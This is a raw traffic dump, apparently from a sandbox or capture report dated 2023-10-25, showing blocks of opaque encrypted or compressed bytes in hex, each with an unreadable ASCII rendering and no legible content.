                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC963INData Raw: af f9 e3 0f 4e d5 5d 14 a5 1c 93 be 93 61 3d 3d 5d e0 f3 68 5a 24 21 a9 b3 46 90 a4 69 0d 19 9c 26 96 ae dc 58 84 dc d5 c5 05 0e 99 fd 81 fc 65 ac 0c a6 c5 7e 91 43 31 85 11 81 5c 54 63 aa 4c c3 78 a7 34 9d 82 6e 5a e5 80 87 37 97 fd 2f 8d 36 f4 ae 9f 4d 5f 1f 84 8e a8 f6 b7 f1 05 69 85 a5 5c 2f 03 12 5c f6 03 cf 39 f6 1c 0e 27 3d 54 77 1d 95 2f de 69 56 1e 91 58 76 0f 65 7c 2e 4f 6a 4d 15 6d 82 57 ec 0f 5a 75 ba 51 8a 36 3d ec d6 75 1c a6 d5 19 d9 6a fb cc 77 eb e5 49 f0 7b 5f 6d c6 c3 1e ae 62 b6 79 d9 9b f9 fc e0 1d 8c 47 70 70 08 63 28 8e c2 40 58 19 3e 48 ff b3 98 2a 4e bd 06 e0 7d 3a c7 56 12 86 75 89 e3 a8 f1 58 55 0a 41 02 56 51 74 a0 e0 c0 00 21 0d 44 cb 89 c7 d5 e6 d9 ab ac c8 94 29 af 72 a0 9d 4a f8 02 71 dc a2 1f 9b be ef 56 bc 1b fe b2 66 9e
                                                                                                                                                                                                                                                                                                              Data Ascii: N]a==]hZ$!Fi&Xe~C1\TcLx4nZ7/6M_i\/\9'=Tw/iVXve|.OjMmWZuQ6=ujwI{_mbyGppc(@X>H*N}:VuXUAVQt!D)rJqVf
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC964INData Raw: b6 2c 4b e1 83 4f cb 0e 9c 51 e2 0a ba c0 b4 40 be 31 0a 4e 6e 6f 4f 65 cc 39 27 4c 85 72 82 7e 33 6e e9 94 90 e3 0f 12 55 8a 21 58 af 84 5d 0f e9 32 c4 a2 39 2f a1 f9 99 51 59 ff c5 36 99 1f 26 c3 a6 bd 5c 8c e6 8b cb 16 07 bb ee e2 8f 93 05 2c d6 42 ab ba 68 71 6d f1 2e 6e 5a a3 d9 28 86 9e e3 d8 4e a5 1e 7d e1 f8 4e b4 bd e6 6e cf 61 f6 d4 67 2c 5d 82 ed 07 e0 b7 ab 15 e5 50 4d c8 a9 90 b0 be 80 a1 a9 5e 72 ce 93 ed 99 88 72 77 00 c3 2f 8e 70 3b 7d 3b 13 a9 ec 57 56 96 1c 95 49 78 98 ae d3 73 4a df 9e d0 1d 15 60 5a 40 0c 3c db 61 4f 79 94 e9 c0 f1 1b 51 44 23 2d 13 50 41 1a fb 1a 53 a1 ae 6d e3 88 48 99 2e c1 8b c3 4c 05 4d b8 e2 c9 bb cd d9 26 7d 1e d8 0a 1f 31 ce 60 33 0f de 3f 23 12 a5 67 aa 5c ea f6 d7 32 e9 25 b8 70 c6 5c f7 b0 5c 96 ab 84 03 d1
                                                                                                                                                                                                                                                                                                              Data Ascii: ,KOQ@1NnoOe9'Lr~3nU!X]29/QY6&\,Bhqm.nZ(N}Nnag,]PM^rrw/p;};WVIxsJ`Z@<aOyQD#-PASmH.LM&}1`3?#g\2%p\\
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC965INData Raw: 4a 60 04 67 f2 d5 47 3e 94 fe c5 aa c6 a5 a3 61 30 48 9a aa a7 07 1b eb 58 4a b3 7a f6 f0 75 52 6d 3b fd ce 51 65 ad 7d 26 37 fb 46 ab 59 c1 ef e6 17 65 a3 f0 7c 8f 10 ac 90 48 6d 27 b0 73 15 60 70 10 5e 04 ef 1d 74 51 2f a7 4e cd 2d 33 f6 4b 70 f6 55 44 3a 19 00 e9 7a 16 dc 3c b1 b0 de 1e a6 f4 5f e6 a3 af 01 e3 69 ab be 96 28 b3 e3 dd 10 1d c6 7f e9 a4 d6 63 5e 84 9f 31 41 63 e4 63 a1 73 b5 88 bb 5f 3f 84 6c 1b 3b dd b3 ae 30 a5 14 86 d6 5a 3e cb af fc 69 4b 2b 25 e2 76 e5 9a af 53 fb bf dd 90 da 94 fc 17 ce a3 64 87 db ce 27 ed 51 9b 86 81 37 c2 c3 97 e1 a6 01 f9 fb 57 88 04 69 8e 6c 9b df 36 04 99 57 04 4d af 16 03 cc 8c 73 3a 91 21 f5 73 29 8f 74 eb 76 e9 1e bf 1b 6e e5 51 6d fa d4 e2 2c bc 19 6b 4d 9f 44 bf 45 16 ff 5b 0a 69 f8 ec ad 55 8a 59 37 f3
                                                                                                                                                                                                                                                                                                              Data Ascii: J`gG>a0HXJzuRm;Qe}&7FYe|Hm's`p^tQ/N-3KpUD:z<_i(c^1Accs_?l;0Z>iK+%vSd'Q7Wil6WMs:!s)tvnQm,kMDE[iUY7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC966INData Raw: d6 ef c7 54 5f d3 e1 7e 98 58 30 75 9c 96 1e 83 40 10 ae 9a dc c3 d9 34 f8 bc 38 b2 2a 9b c2 a8 26 b0 d5 4a a0 9d 9e 41 4b 65 17 89 0a 8b 4e 46 a4 67 40 30 02 53 86 09 b6 19 0e 3e 3f af e5 59 bf d0 bf b5 5a 4f 51 08 81 41 89 79 48 43 bd 54 6a a3 5d 1a d1 17 4e dd f8 84 7e 9b 73 7e 82 5f 48 6b 7d 5a 51 b0 d2 3f de 9e 10 12 f0 69 c3 99 f3 86 cd 6b cf 24 61 3f 92 65 9a 7c 50 07 6f 3a 54 2b 2d 4e e5 eb db 59 ef bc d2 64 ed bc c5 da 09 fa b3 07 e1 32 b8 e7 93 41 df f4 b4 50 08 0c c2 77 c1 df ae 96 40 ff 5b 16 f1 bb 4b f7 5f 95 0a 18 6e 39 c7 df bb 72 09 80 6d 39 07 f3 55 36 3b dc 39 2b d9 ca b7 3d 40 3b 74 73 f8 0c bb e2 c7 fe 05 44 7c 50 ec 4a 3c 24 a3 df 0f 85 7e c6 aa 24 b2 56 76 d0 48 22 a9 4d 44 13 82 44 48 88 cc 40 70 21 5c 7c 86 9a 68 3b da d1 6a 9e 51
                                                                                                                                                                                                                                                                                                              Data Ascii: T_~X0u@48*&JAKeNFg@0S>?YZOQAyHCTj]N~s~_Hk}ZQ?ik$a?e|Po:T+-NYd2APw@[K_n9rm9U6;9+=@;tsD|PJ<$~$VvH"MDDH@p!\|h;jQ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC968INData Raw: 14 9a 2a f0 8d 73 a4 0b 4d 78 bb e9 56 17 d4 7e 74 78 a3 f4 19 9c 19 20 8b 5a 05 4c c1 6a 26 e4 fa d0 b5 96 09 bc 74 f7 b3 fa 67 ae fa a8 e4 92 6b 0d 13 a5 0e 6b 01 64 ac 1d c5 3e bf be 52 05 9a ff f5 3f b9 2c 43 db 7e f0 d4 d1 89 ce 68 41 2b 7f e1 05 ae 03 c5 a9 47 b5 dc 7a 09 8b 5a d5 82 11 48 5c 78 5e bd 20 ce 43 8c 32 16 f5 9c 79 b4 56 9c b9 52 b8 70 63 a3 71 e9 79 66 2f 56 e7 c9 3b 90 7b b0 c8 94 5b 59 ce a7 33 cd 83 fc bc 03 b9 55 19 a3 8d 38 17 5b 9d dd 39 48 d2 6b 4f 40 9c 16 c7 58 f9 2d a8 9e 10 45 68 6a 5f 19 98 3c cf b1 3a ec f5 56 12 ac ba dd 5c 98 00 6a db 8a 35 cb ee 26 df 3d 50 85 cf 99 7d 8a 07 07 26 c7 60 2b b7 53 99 5f fc a7 6e 3c ff 0b 75 60 4e fb b5 3c f2 92 a0 af 81 cb 43 67 52 b3 83 37 a8 85 2b 3d 5a bc fb fc 5c db 08 d4 f0 2f f6 bd
                                                                                                                                                                                                                                                                                                              Data Ascii: *sMxV~tx ZLj&tgkkd>R?,C~hA+GzZH\x^ C2yVRpcqyf/V;{[Y3U8[9HkO@X-Ehj_<:V\j5&=P}&`+S_n<u`N<CgR7+=Z\/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC969INData Raw: 22 2f d7 9c 67 92 9c f8 22 9d 0c 62 3f e5 3c 6d 66 73 d8 c0 92 e5 1c e3 d1 47 1b 8f 59 df 9d 7e 3f b9 d8 2e d0 c2 ea 3b c4 39 94 f8 16 27 78 2b 9c f0 29 e7 53 a9 7e 99 88 2d 3e aa 81 c4 34 42 9d 31 13 dc cd 73 12 c6 cc c0 fa 62 ea 52 b7 20 e9 aa 7d fd 3f 91 1f 8a 43 01 d0 7f bd 48 35 f1 93 95 ac 71 af 76 c4 75 f4 67 df e6 77 7a 49 a0 cc 6d 64 d6 03 c0 ec c3 ed df ff 7a 2d c0 90 1a 55 7e f0 ef 33 b7 db 59 cf bd b7 e2 fb a3 b3 72 e1 c2 ec c0 a1 a5 c3 27 93 87 87 bd 55 bb e8 8e 77 f6 a3 90 08 51 88 20 b8 b6 c0 b4 c9 58 42 7e 4e 4e a8 1a 6f 6e 2a 2d a5 41 35 4a 7c 41 ba 32 13 4a cb 44 50 09 74 8c 20 22 8d 14 ec 4d 2c 42 e5 53 8d 69 e9 4a 04 19 9a 9b 8b 31 a7 e6 42 a1 5c 24 9d 47 10 72 b4 70 2f 0a d9 3f 40 d0 2e 01 0c a9 43 ed 47 3f 3e 70 b7 71 63 6c 6a cb f7
                                                                                                                                                                                                                                                                                                              Data Ascii: "/g"b?<mfsGY~?.;9'x+)S~->4B1sbR }?CH5qvugwzImdz-U~3Yr'UwQ XB~NNon*-A5J|A2JDPt "M,BSiJ1B\$Grp/?@.CG?>pqclj
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC970INData Raw: e1 9a 73 c9 45 d8 dc 42 bd b6 b8 b6 4b 9f 4d a5 e4 71 f0 68 22 0c 4e d3 d9 64 b6 1c 9a 3c 05 e0 f8 dc 97 3d 56 05 3b 57 22 dc b4 13 b1 93 45 c5 31 aa f3 72 a5 f5 06 19 09 d0 dc f1 68 24 0d 91 86 11 25 23 fd 91 fe b1 42 b7 34 48 2a 46 4d a4 b3 55 74 02 d5 d4 6f 05 12 f8 62 d1 df b8 1b db 62 b9 d8 4d 9d ef cf d3 80 f0 fd 39 52 11 02 55 88 33 34 35 e6 c5 0a 7d be f9 4c cf 3d 4d 8f ef 42 d5 62 77 10 99 41 f1 24 99 94 46 51 e6 d1 88 39 dc 2d 78 c7 9d bb c4 4d 56 20 dc 3b 87 b7 c1 50 46 54 7e ad 23 cf 0f ba f9 cd 5f 7d 49 39 53 3b 7a a2 b0 de c4 a8 fc f6 26 2b 8e 21 15 51 08 5a 29 91 26 15 93 08 6a 19 90 fb 99 f2 ab be 9b bc f6 db 07 e2 71 49 3f 4a e0 d6 28 bc 04 87 24 28 60 7b bf 48 ca 4e e4 54 2b b9 f4 7a 29 2f 29 81 fe 1b 54 84 2c c7 e0 f0 62 5b 14 f2 72 16
                                                                                                                                                                                                                                                                                                              Data Ascii: sEBKMqh"Nd<=V;W"E1rh$%#B4H*FMUtobbM9RU345}L=MBbwA$FQ9-xMV ;PFT~#_}I9S;z&+!QZ)&jqI?J($(`{HNT+z)/)T,b[r
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC972INData Raw: 84 ed 24 57 bb cf 6a e7 11 2f fe 05 52 df cf f3 98 e8 16 7d e7 41 65 00 26 10 00 50 88 99 4a f0 5c 25 b8 72 77 de ab 2b 69 42 54 b9 58 db ac 8e f9 18 ec e5 62 75 b8 70 cc a3 82 e7 10 29 59 09 00 0e 54 2e fb 8c 49 67 31 b9 f8 ef fa 64 4c 18 92 86 8e 84 0d 5b 0e 85 b8 41 01 73 05 87 77 51 d5 90 dd a5 64 17 89 c8 f1 67 2f ac 92 5e a4 02 9b 9b 85 c3 88 a9 84 ec b4 ff be f7 97 11 8b 1c 1b 24 9c 58 98 59 b3 2f 1d 29 1c 00 70 99 ce 94 1d f8 1f 55 be c3 a4 f3 cc 64 e5 0f 9a 80 48 05 d6 6c d8 b2 37 46 31 f9 10 5f 8e a0 d4 76 7b a9 46 c6 e8 d7 b5 05 8e 2c ac f2 b9 88 97 28 35 45 d2 27 be 4a 56 3b 01 92 37 01 fb d2 e1 2c 02 c0 5a 71 7b cc fb 40 c8 94 b2 6a 61 62 66 cd 86 ad e6 01 a6 1f 42 88 e3 86 aa 42 2c a7 f2 40 b2 b3 b5 8f 25 17 d5 22 c8 88 ea a6 b1 6e 9d 93 c0
                                                                                                                                                                                                                                                                                                              Data Ascii: $Wj/R}Ae&PJ\%rw+iBTXbup)YT.Ig1dL[AswQdg/^$XY/)pUdHl7F1_v{F,(5E'JV;7,Zq{@jabfBB,@%"n
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC973INData Raw: 5f f6 34 64 bf 73 ef 2b 2d a7 6d 57 23 54 0c 11 48 d9 52 74 02 b5 83 7b 67 b7 90 86 6a d8 b9 70 2e 85 82 7b 91 7b 7a ad a8 e1 a4 5d 7a 11 af d7 6a b1 ef a9 61 6d b8 79 f2 34 63 5f 02 9c 86 2c 69 ae f2 ef 7b 40 c1 56 c8 df b5 5f 98 81 e2 e8 ff 85 a1 b9 7d 25 2d 3e 89 ae 73 9e dd 21 0d 84 4a 1a 28 ba ce 99 a4 de 8f 49 43 0c ab 6a ae 31 c3 c4 b0 6b 16 df 44 30 b5 73 e6 6b 67 5b ee e0 34 88 e1 bd be 11 be a2 d4 7b 4d fe 1c c6 27 ad 4b 81 d5 ab 65 bf 3c 58 31 66 0d aa 6d 14 7e 7a 8e 97 34 ae e6 19 26 39 57 9c c2 39 95 d7 28 a5 35 f7 1b 25 cf 5b 6b 61 eb 63 2f a5 74 56 e5 5c 5e 8b ae 38 7d 6e 09 bb f7 1c 67 b5 3e 56 cf 52 71 e4 5e dc 6e 2b a4 bc 58 29 58 7b f0 22 9a d6 ca db 4e 79 66 8c 36 e3 9a a1 6b fe cf 4b a4 30 c9 c0 6f 13 35 46 37 31 52 16 d2 af 48 c1 54
                                                                                                                                                                                                                                                                                                              Data Ascii: _4ds+-mW#THRt{gjp.{{z]zjamy4c_,i{@V_}%->s!J(ICj1kD0skg[4{M'Ke<X1fm~z4&9W9(5%[kac/tV\^8}ng>VRq^n+X)X{"Nyf6kK0o5F71RHT
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC975INData Raw: b3 6c f1 d6 be e8 b5 18 05 98 9e 63 a9 84 60 77 fd 91 53 84 eb 33 9e 4a 3b f8 b5 04 59 84 36 cb 91 6c 86 e8 d5 29 0e 9d 44 b7 23 d2 16 b2 7c 72 a7 29 44 7f 96 e4 36 51 3e a5 f2 9f 5a a3 7d 79 f5 34 85 f2 cf 4f ab d6 11 5d 37 7d 31 43 28 23 f5 32 71 35 a1 e0 3d 73 a2 42 8b 59 f8 9a 61 2d 67 cb 54 e4 b9 62 52 2b 4a 3e 2b 4d 54 46 5b 39 b6 59 15 7c 95 cc ab 2a b5 80 ea 51 35 cd a7 fd cc 6a 23 7a c4 31 a8 ee b6 7a f6 1a 32 7a a1 d1 a5 89 ef 20 5b 33 65 2d d8 e6 b4 c2 da ae 6b 87 d6 81 6e 46 27 4f 17 7d dd c9 f9 38 87 f5 7c a1 37 77 7d 11 21 fa 45 5c d7 0d e4 ee 50 62 01 83 66 43 ad 86 8b 37 92 98 cf e8 a8 b1 ef 8d 17 6e 22 be 25 93 1a 53 0d 0e 53 37 8d 6e d6 8c d0 11 f6 75 94 94 cf 2c 6c 8e b5 f9 c4 66 2d 34 ef d8 f1 e2 f1 3d 72 63 d6 e6 1c fb 64 5e e3 66 e0
                                                                                                                                                                                                                                                                                                              Data Ascii: lc`wS3J;Y6l)D#|r)D6Q>Z}y4O]7}1C(#2q5=sBYa-gTbR+J>+MTF[9Y|*Q5j#z1z2z [3e-knF'O}8|7w}!E\PbfC7n"%SS7nu,lf-4=rcd^f
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC976INData Raw: 24 fa 29 f8 d8 71 6d e3 40 ee 81 5d b0 7a dd 60 4e a0 99 d9 f1 35 1c c5 6e ec c6 0e 76 70 02 27 48 de 67 b4 52 f9 6e e8 ea 50 3b 5b 0c 1d 9e 5b 65 6f b4 ef d5 c0 56 ba 03 88 e9 64 03 68 26 02 91 61 65 3a 83 81 16 df bc 77 39 0e 1f 78 bf 50 65 d0 2c 73 5d a9 60 34 1d 8a e7 05 99 ca a1 fe d3 09 67 0a eb ab 71 78 c9 66 cd e8 a8 2f 3b 70 82 1c 39 11 80 16 73 21 71 14 9c cc e2 b8 0f ac 5b a4 ce 86 13 06 88 74 d8 d1 e0 85 61 c3 a6 17 04 b1 f0 4d 71 40 67 86 e3 8d 6e 3e 37 69 cd 0d 8a bc 90 80 d2 9d f5 18 55 ca 43 2d 05 e0 46 05 2c 0b f8 53 e5 5e f1 a8 a5 8c 43 0f ea d5 de 2d 49 cd 0b d9 97 0b cf 00 ff 29 0b f0 94 a4 d1 97 2d 57 36 bf 0f 03 37 86 68 71 97 4f 9e db 85 b4 3e df 99 e9 70 b6 9a 1a 3a 74 12 f4 b0 18 96 d3 b3 a3 7d 22 9c ed fc 22 73 ad bc 63 24 33 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: $)qm@]z`N5nvp'HgRnP;[[eoVdh&ae:w9xPe,s]`4gqxf/;p9s!q[taMq@gn>7iUC-F,S^C-I)-W67hqO>p:t}""sc$3=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC977INData Raw: 9b 00 3c c8 17 3b f8 b9 0c 63 c4 2a b8 09 93 2a ca aa a5 2a fc b0 82 95 fb ef ed 73 7c 2f c0 de f6 f5 7f ff 5d f4 8d 33 10 a9 15 3c 39 0b 35 33 c8 46 2a 76 1a 5e fb ce 22 ae 67 ad bb 8f 79 cc 66 e6 6b 07 a3 56 eb 54 0f cd 52 ba 4a 0b a8 1e af 34 80 3a db 2c 41 c6 a1 9e 7f a2 d2 06 e3 e8 18 4c 2e ac d3 82 04 eb e2 be 24 46 dc b5 4b d5 9f 71 a7 20 7f a8 03 2a aa 82 b7 ca 35 9a a8 71 1b 37 c0 55 9e 1b ca f5 ce cd 54 27 c6 6e bf 22 93 9c d5 59 c4 d5 af f5 f2 31 3f 19 90 4e 98 85 21 15 27 15 27 15 25 15 a5 36 49 dd 6c a5 75 6c 07 43 62 f8 a9 fe de 7f df f4 ce 8f 47 0f 51 86 6b 54 8f 93 29 ed 3a c6 10 39 a6 a1 e4 cb 4d 27 21 74 ea ee 43 c2 5b 80 85 c0 23 97 1c 08 5f dd 3c 07 f6 f5 33 14 0d 02 22 52 e8 f7 b1 09 8b 85 d9 b6 dd b7 1a 35 26 dc 72 57 e2 97 c1 a1 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: <;c***s|/]3<953F*v^"gyfkVTRJ4:,AL.$FKq *5q7UT'n"Y1?N!''%6IlulCbGQkT):9M'!tC[#_<3"R5&rW
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC978INData Raw: 73 7b 58 62 c3 ce a5 88 cb 6a 8b 3d 1d 16 a5 c6 9a de db 9a 7a b8 1c f3 f9 cf bd ac 19 02 63 7d aa e6 59 ac e3 10 0e 61 01 0b d8 8d dd 69 3a 1f e4 e8 2a 7d de 2a 1d 26 6a 71 07 bf b1 7c 83 ba bf de f5 37 df 04 42 24 25 7b 98 34 c9 4b 6a 23 41 4f 16 93 6a f8 91 36 fa ae ef db 04 17 fe fd 9a bf 2c 9e 4f 65 a1 a4 9c 7e d6 a4 e9 37 ea 0a 82 f4 73 25 dc 84 76 52 44 2f a4 e7 64 b2 e2 9d 5e 0b c2 9d ac 52 72 62 be ec c0 d9 12 b7 09 4e a7 4f e0 bf 8b 41 fa 4d 21 d9 85 64 c8 46 3e 2d 2b 93 e5 4a 4d 55 2b 99 f8 e0 92 d5 a3 cb 01 ff fd c9 23 87 2b 25 81 10 87 69 d2 86 37 94 18 fe c4 03 2c c7 2a 9a 8d 8d 13 0f 33 46 45 35 f5 ca 66 f4 25 ad 9d c3 0e 44 3a b3 fb c0 53 8b 16 59 1a 85 2f ed 20 6a a9 b8 fa 11 6c 4d 31 46 b8 92 7d cd 77 06 64 2b fc 02 b7 e1 0e dc 81 db 70
                                                                                                                                                                                                                                                                                                              Data Ascii: s{Xbj=zc}Yai:*}*&jq|7B$%{4Kj#AOj6,Oe~7s%vRD/d^RrbNOAM!dF>-+JMU+#+%i7,*3FE5f%D:SY/ jlM1F}wd+p
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC980INData Raw: 6a 53 b5 7e 90 45 76 f5 2c 20 5b c8 8a 84 ac 28 e1 ab e8 6f 08 bd b3 7b f8 f7 b5 8f be f3 07 ad 36 54 d5 4e fd 22 68 2c 71 85 b5 9b 07 37 79 1f 29 89 17 24 f1 b0 36 e5 38 72 7a 38 0a 38 27 c3 82 9c ed 98 89 79 b8 38 10 18 29 f2 40 a6 a3 e4 57 8f e9 06 0f d0 eb 5c 56 ee 30 0d 98 9f 13 4f 2c 7e 95 79 e7 e9 c6 f7 6f ff cd c1 78 73 fe 4c b8 c3 7d d2 2e 5d ab 4f 89 c9 89 17 c8 67 ab f2 5f 3f 21 27 a3 2b 4f 24 5e 32 fc fc 47 19 cf 46 1a a0 02 af 53 6d 1a d5 a6 51 ed 18 d5 8e 69 bb 71 ea 66 09 14 01 74 ef 9d e2 10 64 4e 67 bf ac ac d7 7e bb f1 4e ee a4 5d b4 6d b4 94 22 5e f8 c6 bd 57 a3 8f bd bf 2e ca db b1 cf d4 bd 4f 6d c7 c0 cd 60 88 7c fb 6e 56 67 79 6a e2 74 74 ed 47 e2 95 53 d0 12 86 0f 93 ba bb 93 e2 4c 4f 53 ee 08 c2 f0 1e b7 f5 a1 4c d6 1c c8 10 91 b8
                                                                                                                                                                                                                                                                                                              Data Ascii: jS~Ev, [(o{6TN"h,q7y)$68rz88'y8)@W\V0O,~yoxsL}.]Og_?!'+O$^2GFSmQiqftdNg~N]m"^W.Om`|nVgyjttGSLOSL
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC981INData Raw: e9 32 0f 69 e5 fc 4f 6e 0f 6e 63 c2 e7 73 95 8e 01 85 29 fc 3f ca cf ed 47 f9 0b f4 46 7b 8d bc 86 e0 1c 56 e9 28 f8 93 4e 6e 46 1b fc 35 1e c0 03 78 00 77 e1 2e bc 02 af a0 b2 2f aa 3e 7f 08 af e2 6a 36 cb ca 29 99 42 ca 42 e5 c6 8f 72 9e ad c4 e7 7b 5d 58 a5 a8 cb af 78 96 1c 98 04 7c 72 43 87 34 f0 07 66 74 71 14 e0 01 dd ee e2 4c df 3c a6 3e ba e2 83 4f 72 ae cd 0b 25 a2 5a 5e 5c e6 fc 3d 3a e1 91 61 ea 4e 08 a8 7d 8f a2 75 8a 4d a2 f7 0e 27 bb 05 84 26 d9 71 00 87 49 21 86 43 94 8b d8 52 34 a5 ac 79 a8 94 16 63 33 63 54 ae 88 d9 fc c6 f4 77 33 d9 75 7a 79 97 51 c6 2a a6 7e fe 17 94 e2 3c 56 b0 9b 1e 25 41 61 1e 2b 3a 6c 4f a6 92 c7 3c 94 3b ee 50 9b b7 17 bb fa 5a 59 74 5a 57 73 18 49 88 b1 3c 43 73 87 88 d1 72 ba 90 1b 51 cc 9b 0a 45 92 ac fd 5f bd
                                                                                                                                                                                                                                                                                                              Data Ascii: 2iOnncs)?GF{V(NnF5xw./>j6)BBr{]Xx|rC4ftqL<>Or%Z^\=:aN}uM'&qI!CR4yc3cTw3uzyQ*~<V%Aa+:lO<;PZYtZWsI<CsrQE_
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC982INData Raw: 0b 79 4c eb 2a 5b 13 f9 4e e9 6d 14 09 c4 3f d1 44 a3 92 a0 e6 d1 46 53 0f 63 0b 58 31 c1 62 e1 34 05 90 d5 a5 b6 b0 e7 6f 4d da 39 f5 69 53 36 73 44 e7 f4 1c e7 30 3b 92 90 14 4f 1d 6f 25 24 bd d3 db bd 38 91 64 d1 0f 58 23 19 cd 47 1e 8d c2 6e 66 cb bc f4 78 43 30 30 a2 14 3e 5d 6d ad d1 cc ea 45 a8 ba 58 72 29 1e 3d c6 1d 15 0d 26 9b e7 d0 20 52 eb 73 6b e6 77 e1 a7 00 13 c4 5b e0 32 f9 3a b8 19 6f ab c1 84 ed 1c c5 26 4a 7c 9b ff f0 60 aa 32 06 41 c0 c3 30 71 36 ed ce d6 ab 71 1d c6 4c 59 cd 17 2a 79 0a 86 ae c7 45 59 5e 05 f1 d6 78 6d 5c 38 9d 2d 81 c3 6a 9c 86 6e c1 07 3e ea 87 cc f4 04 f3 81 b0 85 bb d1 5e 97 2f a6 d0 ac b0 0f 0b c5 df b0 9c 95 51 e0 f9 28 c7 00 8d ce 20 de 73 ce 77 98 69 1e 31 d8 3c e7 8f fa c0 c6 3e 94 2a a8 c9 fd 14 68 70 1e 3e
                                                                                                                                                                                                                                                                                                              Data Ascii: yL*[Nm?DFScX1b4oM9iS6sD0;Oo%$8dX#GnfxC00>]mEXr)=& Rskw[2:o&J|`2A0q6qLY*yEY^xm\8-jn>^/Q( swi1<>*hp>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC984INData Raw: 19 1f 8b da 11 62 50 f1 65 f5 29 34 33 71 f3 39 e1 b8 af ec 0f 95 7b 7e f9 c3 13 86 e7 36 a5 b1 28 ce 0d 9d 06 7b 67 73 ad c0 79 e1 26 db 79 b7 c6 86 d4 fb 10 09 b9 93 f4 7d 1c 2d 88 17 98 7e 2a 3e 89 13 90 04 f2 18 15 3a 42 08 f0 7e 5e a1 6d c6 1a 1f 82 43 a0 c3 3f 10 f4 20 b0 da d2 ab a1 4a 7f 1e bf f4 9f 59 ff 04 99 80 42 c3 99 3e 87 bf 5f 0e bc 05 ed 73 34 95 08 30 4f ff c6 3d ae aa cf 7c 8d 8a 81 bd 22 fc 98 4a 14 9e ff e9 2f 07 1f e6 b4 b7 03 a1 69 79 13 88 bc 09 85 54 e4 ff 74 46 9e e7 73 62 07 a7 d4 05 7f 33 fd f1 db da 89 ef 93 03 3e 37 7b 9f c3 0d c5 65 cb 87 b8 c3 d5 b2 e7 ae d2 76 26 9c cb df bd 76 7b f2 5e b2 be 3c e7 d1 5f f1 d7 b3 f2 57 31 0d a9 d0 ff 16 d7 6d 97 2a cd dd ed c3 7a 1b 3f 46 f4 20 f7 69 9b c3 d3 78 26 e0 ad c8 7d af 53 7d 9f
                                                                                                                                                                                                                                                                                                              Data Ascii: bPe)43q9{~6({gsy&y}-~*>:B~^mC? JYB>_s40O=|"J/iyTtFsb3>7{ev&v{^<_W1m*z?F ix&}S}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC985INData Raw: 85 43 0b 23 df f9 be 66 2c 36 76 ff da 5f 5f 7d c4 a0 85 5d d0 15 6f 20 8f a3 73 36 04 ea fe d5 5f 7d 76 84 1d 3a a1 dc 1b 5d 79 fb 76 44 2a 85 4c 7d 53 4b db 73 85 94 1a 9c 51 7e b3 35 27 e4 4a d5 90 f4 34 7f 7a 8e e4 c5 c3 3c e8 10 b7 31 b8 52 91 70 35 87 c4 37 7d 1e 3f 5e 45 ce aa ef ee 84 83 6a 5d 92 e8 50 42 d5 a9 22 37 34 0a d6 3e 47 30 b1 d1 51 ed 0d 3a 0e ef 81 40 51 e2 52 fc b8 8e 2c 6a 9e 88 79 d6 87 73 4f f1 c3 ed 9a 71 ed 49 69 4e cf b4 19 47 3a 71 56 2a f4 92 c1 be e4 95 18 d4 e2 d4 7d c8 84 fd af 27 28 fd 39 2f a7 a0 21 22 a6 bd 61 a0 49 c9 bd 68 f7 ea a8 28 c7 5c 5b a1 ae e8 fa 7c a3 bf 4f c3 52 ea b8 33 01 cc 6c 88 ef e3 2c 0e 57 3b ac fe 2d 8e e3 38 a9 a6 73 d7 2b cb 94 03 8a c8 31 15 b8 4c d6 f9 76 c5 33 27 5f 7b 7b 57 2e b2 4c 2c 59 de
                                                                                                                                                                                                                                                                                                              Data Ascii: C#f,6v__}]o s6_}v:]yvD*L}SKsQ~5'J4z<1Rp57}?^Ej]PB"74>G0Q:@QR,jysOqIiNG:qV*}'(9/!"aIh(\[|OR3l,W;-8s+1Lv3'_{{W.L,Y
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC986INData Raw: ed 90 f4 27 42 c8 6e 0a 8a a1 17 c4 fd e0 41 10 49 5f a9 a3 55 58 ba 10 a7 9b 6a e2 0d 3c 3e 42 fd d0 73 aa 16 07 0f c5 13 04 cf d3 31 ef 72 38 10 cb 82 46 38 4b b2 86 b5 e2 d2 f6 ed da fe dc ee 06 2c 45 c4 c1 81 b0 12 15 4f 6c 43 63 99 cb 02 02 1c 43 d1 11 6a 85 c3 3a 14 ca 16 79 45 17 7d 11 16 fa 5d 32 76 ca b3 78 53 da 22 34 d6 67 f3 f1 f4 8b fc 30 38 9f 8e d4 89 eb 9f 88 35 dc af c3 59 f2 c5 5e c1 0d 13 c0 87 4a f6 28 a0 80 b1 d6 98 4f 95 11 ff 22 27 64 8c ab 07 fe 78 74 4b 68 f4 89 07 e6 d9 b7 82 93 13 0f 81 a9 5e 80 ee 36 33 d1 df 06 8c 4f 1e f9 a1 bb 15 40 29 06 02 32 6e e9 ac 57 b8 87 e7 fa 11 c1 15 00 15 d9 ab 47 52 63 65 fa c6 19 2e 4a 74 e3 24 f0 31 67 33 a3 cf 83 f4 d0 fc 72 df 21 ba b6 e8 07 e0 2c 1d 98 a5 39 1a 47 97 0a f4 b5 fa 00 08 e4 8e
